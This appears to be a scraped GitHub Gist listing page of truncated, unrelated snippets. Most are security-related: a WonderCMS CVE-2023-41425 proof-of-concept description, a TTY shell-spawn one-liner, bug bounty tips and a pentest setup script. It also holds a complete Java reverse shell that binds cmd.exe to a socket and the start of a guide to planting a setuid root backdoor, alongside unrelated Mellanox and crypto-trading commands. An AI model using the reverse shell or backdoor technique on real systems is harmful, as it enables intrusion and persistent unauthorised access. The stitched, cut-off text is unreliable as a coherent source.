Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
The attached exploit "exploit.py" performs the following actions:
prodigiousMind
/ CVE-2023-41425.md
Last active
December 30, 2024 09:34
CVE-2023-41425 (WonderCMS Remote Code Execution) - PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------------------- | |
| # ofed_info -s | |
| -------------------------------------------------------------------------- | |
| Find Mellanox Adapter Type and Firmware/Driver version | |
| ConnectX-4 card | |
| # lspci | grep Mellanox | |
| 0a:00.0 Network controller: Mellanox Technologies MT27500 Family [ConnectX-3] | |
| # lspci -vv -s 0a:00.0 | grep "Part number" -A 3 | |
| # lspci | grep Mellanox | awk '{print $1}' | xargs -i -r mstvpd {} |
$ ./zenbot.sh trade gdax.eth-USD --trend_ema 20 -period 7m --max_slippage_pct 0.48 --poll_trades 6000 --order_poll_time 6000 --order_adjust_time 6000 --oversold_rsi_periods=1000 --oversold_rsi=1000 --rsi_periods=1100 --neutral_rate=0.1 --max_sell_loss_pct=0.85 --max_buy_loss_pct=5 --buy_pct=100 --sell_pct=100 --selector gdax.eth-usd --markup_sell_pct 0.25 --markdown_buy_pct 0.00 --reset-profit
MarkBaggett
/ custom_caesar.py
Last active
July 16, 2023 14:57
Python - SQLMAP - Tamper Script for Custom Caesar Cypher
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from lib.core.data import kb | |
| from lib.core.enums import PRIORITY | |
| import string | |
| __priority__ = PRIORITY.NORMAL | |
| def dependencies(): | |
| pass |
chosenonehacks
/ gist:7d8f7853027594961d3dbcc8b190ee9f
Last active
April 2, 2019 20:32
Spawn TTY Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python -c 'import pty;pty.spawn("/bin/bash")' | |
| #or | |
| /bin/sh -i |
EdOverflow
/ github_bugbountyhunting.md
Last active
April 7, 2025 13:18
My tips for finding security issues in GitHub projects.
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
gabemarshall
/ osx-for-pentesting.sh
Last active
November 30, 2024 05:28
— forked from matthewmueller/osx-for-hackers.sh
A fork of osx-for-hackers for my personal pentesting setup preferences
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # OSX for Pentesting (Mavericks/Yosemite) | |
| # | |
| # A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465) | |
| #!/bin/sh | |
| # Ask for the administrator password upfront | |
| echo "Have you read through the script prior to running this? (y or n)" | |
| read bcareful |
dergachev
/ setuid-root-backdoor.md
Last active
September 2, 2024 12:08
How to use setuid to install a root backdoor.
Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.
While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).
If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur